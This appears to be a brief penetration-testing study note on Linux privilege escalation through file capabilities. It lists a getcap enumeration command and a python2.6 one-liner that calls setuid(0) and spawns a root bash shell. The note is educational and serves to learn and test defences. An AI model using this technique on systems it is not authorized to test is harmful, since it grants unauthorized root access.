Capabilities

  • Similar to suid but more secure.

Enumeration

  • getcap -r / 2>/dev/null

Exploitation

  • In our example the command to enumerate gave us /usr/bin/python2.6 image

  • We just need to run python with a command that will give us root /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")' image

Resources

Linux Privilege Escalation using Capabilities
SUID vs Capabilities
Linux Capabilities Privilege Escalation
TCM Security - Linux Privilege Escalation

Last updated